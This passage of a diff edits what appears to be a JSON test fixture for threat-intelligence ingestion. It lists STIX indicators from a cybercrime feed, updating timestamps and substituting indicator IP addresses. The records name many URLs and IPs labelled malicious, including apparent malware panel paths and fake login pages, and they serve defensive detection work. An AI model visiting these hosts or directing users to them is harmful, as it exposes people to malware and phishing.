'http://fvrlink.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:53.437Z\"}", "category": "threat", "type": "indicator", @@ -29224,7 +29224,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390339738Z", + "ingested": "2021-12-13T08:38:40.026406300Z", "original": "{\"created\":\"2020-02-23T02:54:02.069Z\",\"description\":\"TS ID: 55342497250; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--6d4b1407-6885-4030-beae-43747e458b8a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-23T02:54:02.069Z\",\"name\":\"mal_url: http://portalcafecomnoticias.com.br/test/js/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://portalcafecomnoticias.com.br/test/js/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:02.069Z\"}", "category": "threat", "type": "indicator", @@ -29276,7 +29276,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390343105Z", + "ingested": "2021-12-13T08:38:40.026413Z", "original": "{\"created\":\"2020-02-23T02:54:09.172Z\",\"description\":\"TS ID: 55342497312; iType: mal_url; State: active; Org: Unified Layer; Source: CyberCrime\",\"id\":\"indicator--8dd72fce-4734-40a1-8e73-cf44c9319fe1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-54\"],\"modified\":\"2020-02-23T02:54:09.172Z\",\"name\":\"mal_url: http://esenciamaya.com/leo/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://esenciamaya.com/leo/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:09.172Z\"}", "category": "threat", "type": "indicator", @@ -29328,7 +29328,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390346601Z", + "ingested": "2021-12-13T08:38:40.026419700Z", "original": "{\"created\":\"2020-02-23T02:54:15.807Z\",\"description\":\"TS ID: 55342497294; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--27b834b0-4113-4eca-8989-d7ada85d0779\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-23T02:54:15.807Z\",\"name\":\"mal_url: http://febvnxp.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febvnxp.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:15.807Z\"}", "category": "threat", "type": "indicator", @@ -29380,7 +29380,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390350198Z", + "ingested": "2021-12-13T08:38:40.026426500Z", "original": "{\"created\":\"2020-02-23T02:54:17.76Z\",\"description\":\"TS ID: 55342497307; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--56334c71-2f84-4e09-a6cc-017577b99970\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:54:17.76Z\",\"name\":\"mal_url: http://febspxi.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febspxi.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:17.76Z\"}", "category": "threat", "type": "indicator", @@ -29399,7 +29399,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 162.144.13.146", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55342497313; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime", "modified": "2020-02-23T02:54:19.374Z", "valid_from": "2020-02-23T02:54:19.374Z", @@ -29421,12 +29421,12 @@ "first_seen": "2020-02-23T02:54:19.374Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "162.144.13.146" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.390353755Z", - "original": "{\"created\":\"2020-02-23T02:54:19.374Z\",\"description\":\"TS ID: 55342497313; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime\",\"id\":\"indicator--12abfac3-5251-45f4-bfde-20e3081d0f29\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-54\"],\"modified\":\"2020-02-23T02:54:19.374Z\",\"name\":\"mal_ip: 162.144.13.146\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '162.144.13.146']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:19.374Z\"}", + "ingested": "2021-12-13T08:38:40.026433500Z", + "original": "{\"created\":\"2020-02-23T02:54:19.374Z\",\"description\":\"TS ID: 55342497313; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime\",\"id\":\"indicator--12abfac3-5251-45f4-bfde-20e3081d0f29\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-54\"],\"modified\":\"2020-02-23T02:54:19.374Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:19.374Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -29477,7 +29477,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390357291Z", + "ingested": "2021-12-13T08:38:40.026440200Z", "original": "{\"created\":\"2020-02-23T02:54:25.477Z\",\"description\":\"TS ID: 55342497258; iType: mal_url; State: active; Org: InMotion Hosting; Source: CyberCrime\",\"id\":\"indicator--8b4fe873-9b07-4985-9818-291623fc07b9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-23T02:54:25.477Z\",\"name\":\"mal_url: http://mawa2ef.com/core/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mawa2ef.com/core/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:25.477Z\"}", "category": "threat", "type": "indicator", @@ -29529,7 +29529,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390361188Z", + "ingested": "2021-12-13T08:38:40.026446800Z", "original": "{\"created\":\"2020-02-23T02:54:39.696Z\",\"description\":\"TS ID: 55342497298; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--c3486bc6-ca92-469f-b0d0-fd8f5cd81580\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-23T02:54:39.696Z\",\"name\":\"mal_url: http://febvnxp.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febvnxp.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:39.696Z\"}", "category": "threat", "type": "indicator", @@ -29581,7 +29581,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390364675Z", + "ingested": "2021-12-13T08:38:40.026453500Z", "original": "{\"created\":\"2020-02-23T02:54:39.976Z\",\"description\":\"TS ID: 55342497308; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--0748270e-f010-4598-a389-553d3fffcb48\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:54:39.976Z\",\"name\":\"mal_url: http://febspxi.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febspxi.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:39.976Z\"}", "category": "threat", "type": "indicator", @@ -29600,7 +29600,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 202.67.10.173", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55342497254; iType: mal_ip; State: active; Org: PT. Dhecyber Flow Indonesia; Source: CyberCrime", "modified": "2020-02-23T02:54:40.035Z", "valid_from": "2020-02-23T02:54:40.035Z", @@ -29622,12 +29622,12 @@ "first_seen": "2020-02-23T02:54:40.035Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "202.67.10.173" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.390368091Z", - "original": "{\"created\":\"2020-02-23T02:54:40.035Z\",\"description\":\"TS ID: 55342497254; iType: mal_ip; State: active; Org: PT. Dhecyber Flow Indonesia; Source: CyberCrime\",\"id\":\"indicator--cd075ee5-9b9f-4203-a9a3-c9592a6f6941\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-02-23T02:54:40.035Z\",\"name\":\"mal_ip: 202.67.10.173\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '202.67.10.173']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:40.035Z\"}", + "ingested": "2021-12-13T08:38:40.026460200Z", + "original": "{\"created\":\"2020-02-23T02:54:40.035Z\",\"description\":\"TS ID: 55342497254; iType: mal_ip; State: active; Org: PT. Dhecyber Flow Indonesia; Source: CyberCrime\",\"id\":\"indicator--cd075ee5-9b9f-4203-a9a3-c9592a6f6941\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-02-23T02:54:40.035Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:40.035Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -29678,7 +29678,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390371658Z", + "ingested": "2021-12-13T08:38:40.026466800Z", "original": "{\"created\":\"2020-02-23T02:54:40.281Z\",\"description\":\"TS ID: 55342497241; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--ed6fe1be-e6b6-436e-9d8f-f2440d34b32f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-23T02:54:40.281Z\",\"name\":\"mal_url: http://dabain.live/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dabain.live/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:40.281Z\"}", "category": "threat", "type": "indicator", @@ -29697,7 +29697,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 50.116.87.108", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55342497251; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime", "modified": "2020-02-23T02:54:48.232Z", "valid_from": "2020-02-23T02:54:48.232Z", @@ -29719,12 +29719,12 @@ "first_seen": "2020-02-23T02:54:48.232Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "50.116.87.108" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.390374904Z", - "original": "{\"created\":\"2020-02-23T02:54:48.232Z\",\"description\":\"TS ID: 55342497251; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--3e220a1d-3d12-4baf-984e-90a3b7431aff\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-59\"],\"modified\":\"2020-02-23T02:54:48.232Z\",\"name\":\"mal_ip: 50.116.87.108\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '50.116.87.108']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:48.232Z\"}", + "ingested": "2021-12-13T08:38:40.026473600Z", + "original": "{\"created\":\"2020-02-23T02:54:48.232Z\",\"description\":\"TS ID: 55342497251; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--3e220a1d-3d12-4baf-984e-90a3b7431aff\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-59\"],\"modified\":\"2020-02-23T02:54:48.232Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:48.232Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -29742,7 +29742,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://193.142.59.96/africa/logs/omc.php", + "name": "mal_url: http://89.160.20.156/africa/logs/omc.php", "description": "TS ID: 55342497316; iType: mal_url; State: active; Source: CyberCrime", "modified": "2020-02-23T02:54:53.263Z", "valid_from": "2020-02-23T02:54:53.263Z", @@ -29767,16 +29767,16 @@ "url": { "path": "/africa/logs/omc.php", "extension": "php", - "original": "http://193.142.59.96/africa/logs/omc.php", + "original": "http://89.160.20.156/africa/logs/omc.php", "scheme": "http", - "domain": "193.142.59.96", - "full": "http://193.142.59.96/africa/logs/omc.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/africa/logs/omc.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.390378761Z", - "original": "{\"created\":\"2020-02-23T02:54:53.263Z\",\"description\":\"TS ID: 55342497316; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--6bc71acc-f3da-4b79-bcc0-7ce4a4a4d4ce\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-23T02:54:53.263Z\",\"name\":\"mal_url: http://193.142.59.96/africa/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://193.142.59.96/africa/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:53.263Z\"}", + "ingested": "2021-12-13T08:38:40.026476800Z", + "original": "{\"created\":\"2020-02-23T02:54:53.263Z\",\"description\":\"TS ID: 55342497316; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--6bc71acc-f3da-4b79-bcc0-7ce4a4a4d4ce\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-23T02:54:53.263Z\",\"name\":\"mal_url: http://89.160.20.156/africa/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/africa/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:53.263Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -29827,7 +29827,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390382148Z", + "ingested": "2021-12-13T08:38:40.026481600Z", "original": "{\"created\":\"2020-02-23T02:54:54.071Z\",\"description\":\"TS ID: 55342497266; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--1fcdf65f-a35b-4556-a7cc-6c61084af334\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:54:54.071Z\",\"name\":\"mal_url: http://fvrlink.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://fvrlink.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:54.071Z\"}", "category": "threat", "type": "indicator", @@ -29879,7 +29879,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390385714Z", + "ingested": "2021-12-13T08:38:40.026486700Z", "original": "{\"created\":\"2020-02-23T02:55:00.871Z\",\"description\":\"TS ID: 55342497310; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--b1974beb-95fb-42b7-b2c0-81f71643da88\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-23T02:55:00.871Z\",\"name\":\"mal_url: http://euromopy.tech/rosemond/backup/dataz/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://euromopy.tech/rosemond/backup/dataz/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:55:00.871Z\"}", "category": "threat", "type": "indicator", @@ -29931,7 +29931,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390389141Z", + "ingested": "2021-12-13T08:38:40.026492500Z", "original": "{\"created\":\"2020-02-23T02:55:00.907Z\",\"description\":\"TS ID: 55342497300; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--48501c24-3a05-4f0c-88f1-2a50eaa227ea\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:55:00.907Z\",\"name\":\"mal_url: http://febspxi.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febspxi.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:55:00.907Z\"}", "category": "threat", "type": "indicator", @@ -29983,7 +29983,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390392948Z", + "ingested": "2021-12-13T08:38:40.026496200Z", "original": "{\"created\":\"2020-02-23T02:55:00.94Z\",\"description\":\"TS ID: 55342497242; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--6cfdb5ac-7f06-48e6-9ba6-67ade05e01d6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-23T02:55:00.94Z\",\"name\":\"mal_url: http://ovdoker.myjino.ru/dashboard/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ovdoker.myjino.ru/dashboard/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:55:00.94Z\"}", "category": "threat", "type": "indicator", @@ -30035,7 +30035,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390396555Z", + "ingested": "2021-12-13T08:38:40.026501100Z", "original": "{\"created\":\"2020-02-23T02:55:03.894Z\",\"description\":\"TS ID: 55342497264; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--f48e2a6f-9af6-4b9c-b9a7-e2775d552731\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:55:03.894Z\",\"name\":\"mal_url: http://fvrlink.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://fvrlink.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:55:03.894Z\"}", "category": "threat", "type": "indicator", @@ -30087,7 +30087,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390399801Z", + "ingested": "2021-12-13T08:38:40.026507900Z", "original": "{\"created\":\"2020-02-23T02:55:15.714Z\",\"description\":\"TS ID: 55342497314; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--a3c0fc0a-ae59-495a-a9cc-b2dfe9a494ab\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-23T02:55:15.714Z\",\"name\":\"mal_url: http://epperfums.com/dino/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://epperfums.com/dino/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:55:15.714Z\"}", "category": "threat", "type": "indicator", @@ -30138,7 +30138,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390424678Z", + "ingested": "2021-12-13T08:38:40.026512100Z", "original": "{\"created\":\"2020-02-24T02:54:25.932Z\",\"description\":\"TS ID: 55344292231; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--abe3e442-e923-4ad1-b4cb-3695a954a2a0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-02-24T02:54:25.932Z\",\"name\":\"mal_url: http://saind.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://saind.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-24T02:54:25.932Z\"}", "category": "threat", "type": "indicator", @@ -30190,7 +30190,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390432252Z", + "ingested": "2021-12-13T08:38:40.026516600Z", "original": "{\"created\":\"2020-02-25T02:52:18.371Z\",\"description\":\"TS ID: 55347597591; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--c19c0ccc-9df8-4804-83da-1c469d220574\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:52:18.371Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/7/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/7/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:18.371Z\"}", "category": "threat", "type": "indicator", @@ -30242,7 +30242,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390437351Z", + "ingested": "2021-12-13T08:38:40.026519900Z", "original": "{\"created\":\"2020-02-25T02:52:27.703Z\",\"description\":\"TS ID: 55347597548; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--00bee6fc-4a90-4160-8493-8176f8cf73ff\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:52:27.703Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/14/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/14/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:27.703Z\"}", "category": "threat", "type": "indicator", @@ -30294,7 +30294,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390441950Z", + "ingested": "2021-12-13T08:38:40.026524600Z", "original": "{\"created\":\"2020-02-25T02:52:27.729Z\",\"description\":\"TS ID: 55347597515; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--952cf095-32f4-4b10-8680-499ccd9f784f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-25T02:52:27.729Z\",\"name\":\"mal_url: http://pabloemino.pw/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pabloemino.pw/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:27.729Z\"}", "category": "threat", "type": "indicator", @@ -30313,7 +30313,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://37.72.168.165/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55347597501; iType: mal_url; State: active; Org: Swiftway Sp. z o.o.; Source: CyberCrime", "modified": "2020-02-25T02:52:27.765Z", "valid_from": "2020-02-25T02:52:27.765Z", @@ -30337,16 +30337,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://37.72.168.165/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "37.72.168.165", - "full": "http://37.72.168.165/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.390445978Z", - "original": "{\"created\":\"2020-02-25T02:52:27.765Z\",\"description\":\"TS ID: 55347597501; iType: mal_url; State: active; Org: Swiftway Sp. z o.o.; Source: CyberCrime\",\"id\":\"indicator--7f18dccc-1649-44ea-b9c7-e445487506a2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-43\"],\"modified\":\"2020-02-25T02:52:27.765Z\",\"name\":\"mal_url: http://37.72.168.165/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://37.72.168.165/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:27.765Z\"}", + "ingested": "2021-12-13T08:38:40.026530Z", + "original": "{\"created\":\"2020-02-25T02:52:27.765Z\",\"description\":\"TS ID: 55347597501; iType: mal_url; State: active; Org: Swiftway Sp. z o.o.; Source: CyberCrime\",\"id\":\"indicator--7f18dccc-1649-44ea-b9c7-e445487506a2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-43\"],\"modified\":\"2020-02-25T02:52:27.765Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:27.765Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -30364,7 +30364,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 185.154.52.251", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55347597469; iType: mal_ip; State: active; Org: EuroByte LLC; Source: CyberCrime", "modified": "2020-02-25T02:52:27.808Z", "valid_from": "2020-02-25T02:52:27.808Z", @@ -30386,12 +30386,12 @@ "first_seen": "2020-02-25T02:52:27.808Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "185.154.52.251" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.390467728Z", - "original": "{\"created\":\"2020-02-25T02:52:27.808Z\",\"description\":\"TS ID: 55347597469; iType: mal_ip; State: active; Org: EuroByte LLC; Source: CyberCrime\",\"id\":\"indicator--4759e40a-5abd-49dc-90fd-2ba8bac1a613\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-25T02:52:27.808Z\",\"name\":\"mal_ip: 185.154.52.251\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '185.154.52.251']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:27.808Z\"}", + "ingested": "2021-12-13T08:38:40.026535800Z", + "original": "{\"created\":\"2020-02-25T02:52:27.808Z\",\"description\":\"TS ID: 55347597469; iType: mal_ip; State: active; Org: EuroByte LLC; Source: 